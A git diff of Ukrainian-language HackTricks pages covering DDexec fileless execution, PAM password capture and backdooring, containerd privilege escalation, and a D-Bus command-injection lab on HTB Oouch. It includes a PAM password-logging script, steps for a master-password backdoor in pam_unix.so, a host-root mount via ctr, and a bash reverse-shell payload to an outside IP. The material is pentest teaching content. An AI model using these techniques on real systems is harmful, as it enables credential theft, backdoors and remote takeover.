з файлу `syscall` адресу, на яку процес повернеться після виклику системного виклику, який він виконує. -* Перезаписати це місце, яке буде виконуваним, нашим "shell"кодом (через `mem` ми можемо змінювати незаписувані сторінки). -* Передати програму, яку ми хочемо запустити, в stdin процесу (її буде `read()` цим "shell"кодом). -* На цьому етапі все залежить від завантажувача, який завантажить необхідні бібліотеки для нашої програми та перейде до неї. +* Перезаписати це місце, яке буде виконуваним, нашим "shell"кодом (через `mem` ми можемо модифікувати незаписувані сторінки). +* Передати програму, яку ми хочемо запустити, на stdin процесу (її буде `read()` цим "shell"кодом). +* На цьому етапі все залежить від завантажувача, щоб завантажити необхідні бібліотеки для нашої програми та перейти до неї. -**Перевірте інструмент на** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec) +**Перевірте інструмент за посиланням** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec) ## EverythingExec -Є кілька альтернатив для `dd`, одна з яких, `tail`, наразі є програмою за замовчуванням для `lseek()` через файл `mem` (що було єдиним метою використання `dd`). Зазначені альтернативи: +Є кілька альтернатив для `dd`, одна з яких, `tail`, наразі є програмою за замовчуванням для використання `lseek()` через файл `mem` (що було єдиним метою використання `dd`). Зазначені альтернативи: ```bash tail hexdump @@ -86,7 +87,7 @@ xxd ```bash SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) ``` -Якщо ви знайдете інший дійсний пошуковик, який не реалізований у скрипті, ви все ще можете використовувати його, встановивши змінну `SEEKER_ARGS`: +Якщо ви знайдете інший дійсний пошуковик, який не реалізований в скрипті, ви все ще можете використовувати його, встановивши змінну `SEEKER_ARGS`: ```bash SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) ``` @@ -94,17 +95,3 @@ SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls ## Посилання * [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec) - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. - -
diff --git a/linux-hardening/linux-post-exploitation/README.md b/linux-hardening/linux-post-exploitation/README.md index 0b7bcbbd1..8190ec2d0 100644 --- a/linux-hardening/linux-post-exploitation/README.md +++ b/linux-hardening/linux-post-exploitation/README.md @@ -1,22 +1,23 @@ -# Пост-експлуатація Linux +# Післяексплуатаційна дія на Linux + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -## Підслуховування паролів для входу за допомогою PAM +## Підловлення паролів для входу за допомогою PAM -Давайте налаштуємо модуль PAM для реєстрації кожного пароля, який використовує кожен користувач для входу. Якщо ви не знаєте, що таке PAM, перевірте: +Давайте налаштуємо модуль PAM для реєстрації кожного пароля, який використовує кожен користувач для входу. Якщо ви не знаєте, що таке PAM, перегляньте: {% content-ref url="pam-pluggable-authentication-modules.md" %} [pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md) @@ -25,12 +26,12 @@ **Для отримання додаткових відомостей перегляньте [оригінальний пост](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Це лише краткий огляд: **Огляд техніки:** -Модулі підключної аутентифікації (PAM) пропонують гнучкість у керуванні аутентифікацією в системах на основі Unix. Вони можуть підвищити безпеку, налаштовуючи процеси входу, але також створюють ризики при неправильному використанні. Цей огляд наводить техніку захоплення облікових даних для входу за допомогою PAM, разом зі стратегіями пом'якшення наслідків. +Модулі підключення аутентифікації (PAM) пропонують гнучкість у керуванні аутентифікацією в системах на основі Unix. Вони можуть підвищити безпеку, налаштовуючи процеси входу, але також створюють ризики у разі некоректного використання. Цей огляд наводить техніку захоплення облікових даних для входу за допомогою PAM, разом зі стратегіями пом'якшення наслідків. **Захоплення облікових даних:** -- Створено сценарій bash під назвою `toomanysecrets.sh`, щоб реєструвати спроби входу, захоплюючи дату, ім'я користувача (`$PAM_USER`), пароль (через stdin) та IP віддаленого хоста (`$PAM_RHOST`) у файл `/var/log/toomanysecrets.log`. +- Створено сценарій bash під назвою `toomanysecrets.sh`, щоб реєструвати спроби входу, захоплюючи дату, ім'я користувача (`$PAM_USER`), пароль (через stdin) та IP-адресу віддаленого хоста (`$PAM_RHOST`) у файл `/var/log/toomanysecrets.log`. - Сценарій зроблено виконуваним та інтегровано в конфігурацію PAM (`common-auth`) за допомогою модуля `pam_exec.so` з опціями для тихого запуску та викладення токену аутентифікації сценарію. -- Підхід демонструє, як компрометований хост Linux може бути використаний для конфіденційного реєстрування облікових даних. +- Підхід демонструє, як скомпрометований хост Linux може бути використаний для конфіденційного реєстрування облікових даних. ```bash #!/bin/sh echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log @@ -42,21 +43,21 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh ``` ### Додавання задніх дверей в PAM -**Для отримання додаткової інформації перегляньте [оригінальний пост](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Це лише краткий огляд: +**Для отримання додаткової інформації перегляньте [оригінальний пост](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Це лише краткий опис: -Модуль аутентифікації з можливістю підключення (PAM) - це система, яка використовується в Linux для аутентифікації користувачів. Вона працює на трьох основних концепціях: **ім'я користувача**, **пароль** та **служба**. Файли конфігурації для кожної служби розташовані в каталозі `/etc/pam.d/`, де спільні бібліотеки відповідають за аутентифікацію. +Модуль аутентифікації, який можна підключати (PAM), є системою, що використовується в Linux для аутентифікації користувачів. Він працює на трьох основних концепціях: **ім'я користувача**, **пароль** та **сервіс**. Файли конфігурації для кожного сервісу розташовані в каталозі `/etc/pam.d/`, де спільні бібліотеки відповідають за аутентифікацію. -**Мета**: Змінити PAM для можливості аутентифікації за допомогою конкретного пароля, обходячи фактичний пароль користувача. Особливий акцент робиться на спільній бібліотеці `pam_unix.so`, яку використовує файл `common-auth`, що включений майже у всі служби для перевірки пароля. +**Мета**: Змінити PAM для можливості аутентифікації за допомогою конкретного пароля, обходячи фактичний пароль користувача. Це особливо актуально для спільної бібліотеки `pam_unix.so`, яку використовує файл `common-auth`, що включений майже у всі сервіси для перевірки пароля. ### Кроки для модифікації `pam_unix.so`: -1. **Знаходження директиви аутентифікації** у файлі `common-auth`: +1. **Знайдіть директиву аутентифікації** у файлі `common-auth`: - Рядок, що відповідає за перевірку пароля користувача, викликає `pam_unix.so`. -2. **Зміна вихідного коду**: +2. **Змініть вихідний код**: - Додайте умовний оператор у вихідний файл `pam_unix_auth.c`, який надає доступ, якщо використовується попередньо визначений пароль, в іншому випадку продовжується звичайний процес аутентифікації. -3. **Перекомпілювання та заміна** зміненої бібліотеки `pam_unix.so` у відповідному каталозі. +3. **Перекомпілюйте та замініть** змінену бібліотеку `pam_unix.so` у відповідному каталозі. 4. **Тестування**: -- Доступ надається через різні служби (логін, ssh, sudo, su, заставка екрана) за допомогою попередньо визначеного пароля, тоді як звичайні процеси аутентифікації залишаються незмінними. +- Доступ надається до різних сервісів (логін, ssh, sudo, su, заставка) за допомогою попередньо визначеного пароля, тоді як звичайні процеси аутентифікації залишаються незмінними. {% hint style="info" %} Ви можете автоматизувати цей процес за допомогою [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) diff --git a/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md index 11d1c9a6e..1fa935d66 100644 --- a/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md @@ -1,18 +1,19 @@ # Підвищення привілеїв Containerd (ctr) +{% hint style="success" %} +Вивчайте та вправляйтесь в хакінгу AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтесь в хакінгу GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний товарний знак PEASS & HackTricks**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Основна інформація @@ -36,7 +37,7 @@ REF TYPE registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - ``` -І потім **запустіть один із цих образів, монтувавши кореневу теку хоста на нього**: +І потім **запустіть один з цих образів, монтувавши кореневу теку хоста на нього**: ```bash ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash ``` @@ -47,8 +48,23 @@ ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:late ```bash ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash ``` -Потім ви можете використовувати деякі з технік, згаданих на наступній сторінці, щоб **вийти з неї, зловживаючи привілегованими можливостями**: +Потім ви можете скористатися деякими з технік, згаданих на наступній сторінці, щоб **вийти з неї, зловживаючи привілегованими можливостями**: {% content-ref url="docker-security/" %} [docker-security](docker-security/) {% endcontent-ref %} + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md index 08c595492..214f1ae2b 100644 --- a/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -1,24 +1,25 @@ -# Перелік D-Bus та Привілейоване Підвищення Привілегій +# Перелік D-Bus та Підвищення Привілеїв Командним Впровадженням + +{% hint style="success" %} +Вивчайте та практикуйте Хакінг AWS: [**Навчання AWS Червоної Команди HackTricks (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте Хакінг GCP: [**Навчання GCP Червоної Команди HackTricks (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -## **GUI перелік** +## **Перелік GUI** -D-Bus використовується як посередник міжпроцесних комунікацій (IPC) в середовищах робочого стола Ubuntu. На Ubuntu спостерігається одночасна робота кількох шин повідомлень: системної шини, яку в основному використовують **привілейовані служби для викладення служб, що є важливими для всієї системи**, та сеансової шини для кожного ввійшовшого користувача, яка викладає служби, що є важливими лише для цього конкретного користувача. Тут основний акцент робиться на системній шині через її пов'язаність з службами, що працюють з вищими привілеями (наприклад, root), оскільки нашою метою є підвищення привілеїв. Варто зауважити, що архітектура D-Bus використовує 'маршрутизатор' для кожної сеансової шини, який відповідає за перенаправлення повідомлень клієнтів до відповідних служб на основі адреси, вказаної клієнтами для служби, з якою вони хочуть спілкуватися. +D-Bus використовується як посередник міжпроцесних комунікацій (IPC) в середовищах робочого стола Ubuntu. На Ubuntu спостерігається одночасна робота кількох шин повідомлень: системної шини, яку в основному використовують **привілейовані служби для викладення служб, що є важливими для системи**, та сеансової шини для кожного ввійшовшого користувача, яка викладає служби, що є важливими лише для цього конкретного користувача. Основна увага тут спрямована на системну шину через її пов'язаність з службами, що працюють з вищими привілеями (наприклад, root), оскільки нашою метою є підвищення привілеїв. Варто зауважити, що архітектура D-Bus використовує 'маршрутизатор' для кожної сеансової шини, який відповідає за перенаправлення повідомлень клієнтів до відповідних служб на основі адреси, вказаної клієнтами для служби, з якою вони бажають спілкуватися. -Служби на D-Bus визначаються **об'єктами** та **інтерфейсами**, які вони викладають. Об'єкти можна порівняти з екземплярами класів у стандартних мовах ООП, при цьому кожен екземпляр унікально ідентифікується **шляхом об'єкта**. Цей шлях, схожий на шлях файлової системи, унікально ідентифікує кожен об'єкт, викладений службою. Ключовим інтерфейсом для дослідницьких цілей є інтерфейс **org.freedesktop.DBus.Introspectable**, який має єдиний метод, Introspect. Цей метод повертає XML-представлення підтримуваних методів об'єкта, сигналів та властивостей, з основним акцентом на методи, обходячи властивості та сигнали. +Служби на D-Bus визначаються **об'єктами** та **інтерфейсами**, які вони викладають. Об'єкти можна порівняти з екземплярами класів у стандартних мовах ООП, при цьому кожен екземпляр унікально ідентифікується **шляхом об'єкта**. Цей шлях, схожий на шлях файлової системи, унікально ідентифікує кожен об'єкт, викладений службою. Ключовим інтерфейсом для дослідницьких цілей є інтерфейс **org.freedesktop.DBus.Introspectable**, який має один метод, Introspect. Цей метод повертає XML-представлення підтримуваних методів об'єкта, сигналів та властивостей, з фокусом на методах, при цьому виключаючи властивості та сигнали. Для спілкування з інтерфейсом D-Bus використовувалися два інструменти: інструмент командного рядка під назвою **gdbus** для легкого виклику методів, викладених D-Bus у скриптах, та [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), інструмент на основі Python, призначений для переліку доступних служб на кожній шині та відображення об'єктів, що містяться в кожній службі. ```bash @@ -29,13 +30,13 @@ sudo apt-get install d-feet ![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png) -У першому зображенні показані служби, зареєстровані з системною шини D-Bus, з **org.debin.apt** спеціально підсвіченим після вибору кнопки System Bus. D-Feet запитує цю службу для об'єктів, відображаючи інтерфейси, методи, властивості та сигнали для обраних об'єктів, які бачимо на другому зображенні. Детально описана сигнатура кожного методу. +У першому зображенні показані служби, зареєстровані з системною шини D-Bus, з **org.debin.apt** спеціально підсвічено після вибору кнопки System Bus. D-Feet запитує цю службу для об'єктів, відображаючи інтерфейси, методи, властивості та сигнали для обраних об'єктів, які бачимо на другому зображенні. Детально описана сигнатура кожного методу. -Важливою особливістю є відображення **ідентифікатора процесу (pid)** та **командного рядка** служби, корисне для підтвердження того, чи працює служба з підвищеними привілеями, що важливо для актуальності дослідження. +Важливою особливістю є відображення **ідентифікатора процесу (pid)** та **командного рядка** служби, корисне для підтвердження того, чи служба працює з підвищеними привілеями, що важливо для актуальності дослідження. **D-Feet також дозволяє виклик методу**: користувачі можуть вводити вирази Python як параметри, які D-Feet перетворює на типи D-Bus перед передачею службі. -Проте, слід зауважити, що **для деяких методів потрібна аутентифікація**, перш ніж ми зможемо їх викликати. Ми ігноруватимемо ці методи, оскільки нашою метою є підвищення привілеїв без облікових даних в першу чергу. +Проте слід зауважити, що **для деяких методів потрібна аутентифікація**, перш ніж ми зможемо їх викликати. Ми ігноруватимемо ці методи, оскільки нашою метою є підвищення привілеїв без облікових даних в першу чергу. Також слід зауважити, що деякі зі служб запитують іншу службу D-Bus з іменем org.freedeskto.PolicyKit1, чи користувачу слід дозволити виконувати певні дії чи ні. @@ -69,7 +70,7 @@ org.freedesktop.locale1 - - - (act ``` #### Підключення -[З Вікіпедії:](https://en.wikipedia.org/wiki/D-Bus) Коли процес налаштовує підключення до шини, шина надає підключенню спеціальне ім'я шини, яке називається _унікальним ім'ям підключення_. Імена шин цього типу є незмінними - гарантується, що вони не зміняться, поки існує підключення, і, що ще важливіше, їх не можна повторно використовувати протягом життєвого циклу шини. Це означає, що жодне інше підключення до цієї шини ніколи не матиме такого унікального імені підключення, навіть якщо той самий процес закриє підключення до шини та створить нове. Унікальні імена підключення легко впізнавати, оскільки вони починаються з - інакше забороненого - символу двокрапки. +[З Вікіпедії:](https://en.wikipedia.org/wiki/D-Bus) Коли процес налаштовує підключення до шини, шина надає підключенню спеціальне ім'я шини, яке називається _унікальним ім'ям підключення_. Імена шин цього типу є незмінними - гарантується, що вони не зміняться, поки існує підключення, і, що ще важливіше, їх не можна повторно використовувати протягом життєвого циклу шини. Це означає, що жодне інше підключення до цієї шини ніколи не матиме такого унікального імені підключення, навіть якщо той самий процес закриє підключення до шини та створить нове. Унікальні імена підключення легко впізнавати, оскільки вони починаються з - іншогочарактеру, який зазвичай заборонений. ### Інформація про об'єкт служби @@ -163,16 +164,14 @@ org.freedesktop.DBus.Properties interface - - - .Set method ssv - - .PropertiesChanged signal sa{sv}as - - ``` -Примітка методу `.Block` інтерфейсу `htb.oouch.Block` (того, що нас цікавить). "s" в інших стовпцях може означати, що він очікує рядок. +### Інтерфейс моніторингу/захоплення -### Моніторинг/Захоплення Інтерфейсу +За наявності достатніх привілеїв (привілеїв лише `send_destination` та `receive_sender` недостатньо) ви можете **моніторити комунікацію D-Bus**. -З достатніми привілеями (просто привілеї `send_destination` та `receive_sender` недостатні) ви можете **моніторити комунікацію D-Bus**. - -Для **моніторингу** **комунікації** вам потрібно мати права **root**. Якщо ви все ще маєте проблеми з отриманням прав root, перевірте [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) та [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) +Для **моніторингу** **комунікації** вам потрібно мати права **root**. Якщо ви все ще маєте проблеми з правами root, перевірте [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) та [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) {% hint style="warning" %} -Якщо ви знаєте, як налаштувати файл конфігурації D-Bus для **дозволу не root користувачам перехоплювати** комунікацію, будь ласка, **зв'яжіться зі мною**! +Якщо ви знаєте, як налаштувати файл конфігурації D-Bus, щоб **дозволити не root користувачам перехоплювати** комунікацію, будь ласка, **зв'яжіться зі мною**! {% endhint %} Різні способи моніторингу: @@ -200,7 +199,7 @@ MESSAGE "s" { STRING "Carried out :D"; }; ``` -Ви можете використовувати `capture` замість `monitor`, щоб зберегти результати у файл pcap. +Можна використовувати `capture` замість `monitor`, щоб зберегти результати у файл pcap. #### Фільтрація всього шуму @@ -222,9 +221,9 @@ dbus-monitor "type=method_call" "type=method_return" "type=error" `busctl` має ще більше опцій, [**знайдіть їх всі тут**](https://www.freedesktop.org/software/systemd/man/busctl.html). -## **Вразливий сценарій** +## **Вразливий Сценарій** -Як користувач **qtc всередині хоста "oouch" з HTB**, ви можете знайти **несподіваний файл конфігурації D-Bus**, розташований в _/etc/dbus-1/system.d/htb.oouch.Block.conf_: +Як користувач **qtc всередині хоста "oouch" з HTB**, ви можете знайти **неочікуваний файл конфігурації D-Bus**, розташований в _/etc/dbus-1/system.d/htb.oouch.Block.conf_: ```xml @@ -245,7 +244,7 @@ dbus-monitor "type=method_call" "type=method_return" "type=error" ``` -Примітка з попередньої конфігурації, що **вам потрібно бути користувачем `root` або `www-data`, щоб надсилати та отримувати інформацію** через цю комунікацію D-BUS. +Примітка з попередньої конфігурації, що **вам потрібно мати права користувача `root` або `www-data`, щоб надсилати та отримувати інформацію** через цю комунікацію D-BUS. Як користувач **qtc** всередині контейнера Docker з ідентифікатором **aeb4525789d8**, ви можете знайти деякий код, пов'язаний з dbus у файлі _/code/oouch/routes.py._ Ось цей цікавий код: ```python @@ -259,14 +258,14 @@ response = block_iface.Block(client_ip) bus.close() return render_template('hacker.html', title='Hacker') ``` -Як ви бачите, це **підключення до інтерфейсу D-Bus** та надсилання до функції **"Block"** параметру "client\_ip". +Як ви можете побачити, це **підключення до інтерфейсу D-Bus** та відправка до функції **"Block"** параметру "client\_ip". -На іншому боці з'єднання D-Bus працює деякий скомпільований бінарний файл на мові C. Цей код **слухає** з'єднання D-Bus **для IP-адреси та викликає iptables через функцію `system`** для блокування вказаної IP-адреси.\ -**Виклик до `system` має уразливість на внесення команд**, тому наведений нижче пейлоад створить зворотний shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #` +На іншому боці з'єднання D-Bus працює деякий скомпільований бінарний файл на мові програмування C. Цей код **очікує** на з'єднанні D-Bus **IP-адресу та викликає iptables через функцію `system`** для блокування вказаної IP-адреси.\ +**Виклик до `system` має уразливість на внесення команд**, тому наведений нижче пейлоад створить зворотню оболонку: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #` ### Використання -В кінці цієї сторінки ви знайдете **повний код C-програми D-Bus**. У ньому між рядками 91-97 ви знайдете, як **зареєстровано `шлях об'єкта D-Bus`** та **`ім'я інтерфейсу`**. Ця інформація буде необхідна для надсилання інформації до з'єднання D-Bus: +В кінці цієї сторінки ви знайдете **повний код на мові програмування C додатка D-Bus**. В ньому між рядками 91-97 ви знайдете, як **зареєстровані `шлях об'єкта D-Bus`** та **`ім'я інтерфейсу`**. Ця інформація буде необхідна для відправлення даних до з'єднання D-Bus: ```c /* Install the object */ r = sd_bus_add_object_vtable(bus, @@ -297,13 +296,13 @@ bus.close() dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #' ``` * `dbus-send` - це інструмент, який використовується для надсилання повідомлення на "Шину повідомлень" -* Шина повідомлень - це програмне забезпечення, яке використовується системами для спрощення комунікації між додатками. Вона пов'язана з Чергою повідомлень (повідомлення впорядковані послідовно), але в Шині повідомлень повідомлення надсилаються у моделі підписки і також дуже швидко. -* Тег "-system" використовується для вказівки, що це системне повідомлення, а не сеансове повідомлення (за замовчуванням). -* Тег "--print-reply" використовується для відображення нашого повідомлення належним чином та отримання будь-яких відповідей у зручному для людини форматі. +* Шина повідомлень - це програмне забезпечення, яке використовується системами для спрощення комунікації між додатками. Вона пов'язана з Чергою повідомлень (повідомлення впорядковані послідовно), але в Шині повідомлень повідомлення надсилаються за моделлю підписки і також дуже швидко. +* Тег "-system" використовується для вказівки, що це системне повідомлення, а не сеансове (за замовчуванням). +* Тег "--print-reply" використовується для відображення нашого повідомлення належним чином та отримання будь-яких відповідей у форматі, зрозумілому для людини. * "--dest=Dbus-Interface-Block" - Адреса інтерфейсу Dbus. -* "--string:" - Тип повідомлення, яке ми хочемо надіслати на інтерфейс. Існує кілька форматів надсилання повідомлень, таких як double, bytes, booleans, int, objpath. З цих форматів "object path" корисний, коли ми хочемо надіслати шлях до файлу на інтерфейс Dbus. У цьому випадку ми можемо використовувати спеціальний файл (FIFO), щоб передати команду на інтерфейс в ім'я файлу. "string:;" - Це для виклику шляху об'єкта знову, де ми розміщуємо файл оберненого оболонки FIFO / команду. +* "--string:" - Тип повідомлення, яке ми хочемо надіслати на інтерфейс. Існує кілька форматів надсилання повідомлень, таких як double, bytes, booleans, int, objpath. З цих форматів "object path" корисний, коли ми хочемо надіслати шлях до файлу на інтерфейс Dbus. У цьому випадку ми можемо використовувати спеціальний файл (FIFO), щоб передати команду на інтерфейс в ім'я файлу. "string:;" - Це для виклику шляху об'єкта знову, де ми розміщуємо файл обертання оболонки FIFO. -_Зауважте, що в `htb.oouch.Block.Block` перший частину (`htb.oouch.Block`) посилається на об'єкт служби, а остання частина (`.Block`) посилається на назву методу._ +_Зверніть увагу, що в `htb.oouch.Block.Block` перший частину (`htb.oouch.Block`) посилається на об'єкт служби, а остання частина (`.Block`) посилається на назву методу._ ### Код на мові C @@ -450,19 +449,20 @@ return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS; ``` 